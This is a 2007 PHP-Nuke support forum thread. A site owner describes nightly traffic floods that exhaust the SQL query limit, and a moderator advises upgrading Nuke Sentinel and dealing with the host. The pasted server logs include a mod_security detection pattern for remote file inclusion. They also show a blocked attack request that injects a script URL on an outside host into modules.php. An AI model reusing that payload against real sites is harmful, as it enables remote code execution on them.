Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> RWH General
Author Message
Fluke
Hangin' Around



Joined: Oct 24, 2003
Posts: 32

PostPosted: Mon Oct 15, 2007 8:07 am Reply with quote

Yes, they are attacking my site somehow flooding the sqluser with > 50,000 queries. Our host only support 50,000 max queries and what is happening is some ip spoof ass is constantly flooding our site. I get up in the morning and we have some funky Sql error. I try a few pages and then I get the message the user has exceeded the limit.

I have everything in Sentinnel turned up, it's also the latest version and yet they still seem to be flooding our site. Maybe I can setup Sentinnel a little further or something but even so, the last user whom I see attacking is like going to the modules.php or doing funky searches. I've already barred guests from searching...

This goes on from like 1am to almost 7am, basically just before i get up in the mornign. I have to then create yet another sql user and update the config.cfg... Getting ridiculous.

[Mon Oct 15 01:12:31 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce2.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:12:33 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:12:41 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce2.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:13:17 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:15:50 2007] [error] [client 72.30.61.80] File does not exist: /home/frontli1/public_html/files/TEKKEN5-DR.html
[Mon Oct 15 01:17:11 2007] [error] [client 194.8.176.2] File does not exist: /home/frontli1/public_html/forums/index.php
[Mon Oct 15 01:18:33 2007] [error] [client 218.58.136.4] File does not exist: /home/frontli1/public_html/forums/index.php
[Mon Oct 15 01:19:39 2007] [error] [client 83.130.251.189] File does not exist: /home/frontli1/public_html/forums/index.php
[Mon Oct 15 01:24:29 2007] [error] [client 74.6.22.39] File does not exist: /home/frontli1/public_html/forums/lofiversion/index.php/t1067.html
[Mon Oct 15 01:32:03 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:04 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:05 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:05 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:07 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:09 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:10 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:10 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:11 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:13 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:15 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:15 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php

Client denied yet it seems to take down our sql user and I have to create a new one because host only allows a maximum of 50,000 queries at a time.

Also, IP lookup says it's Microsoft / MSN!!??? wtf!
 
View user's profile Send private message
Fluke







PostPosted: Mon Oct 15, 2007 9:14 am Reply with quote

Ok, why in Admin it is saying my Sentinnel is up to date 2.5.08 when 2.5.13 is available. Can I follow the readme simply to upgrade? That's a bug I imagine since it didn't pick up a later version that fixes sql injections.... Sigh.
 
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

PostPosted: Mon Oct 15, 2007 10:33 am Reply with quote

Even with mod_security, looks like they are hammering your site. Even an updated Nuke Sentinel won't stop it, Sentinel requires SQL queries to function.

You'll really need to work with your host on stopping such denial of service.
Or get a better host, 50000 query limit is just not acceptable for a database-intensive script like phpNuke.

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
View user's profile Send private message Visit poster's website
Fluke







PostPosted: Mon Oct 15, 2007 10:38 am Reply with quote

Isn't there a way I could redirect anyone trying to hit /home/frontli1/public_html/content/modules.php directly

My understanding is that 2.5.13 is more secure than 2.5.08, yes? no? sql injection etc.
 
evaders99







PostPosted: Mon Oct 15, 2007 3:17 pm Reply with quote

modules.php is the major file phpNuke uses. No way you could disable it and still have your site functioning

There are some security issues with previous versions. You should still upgrade your Nuke Sentinel version. However its flood protection will not stop the hits to your server
 
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> RWH General

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©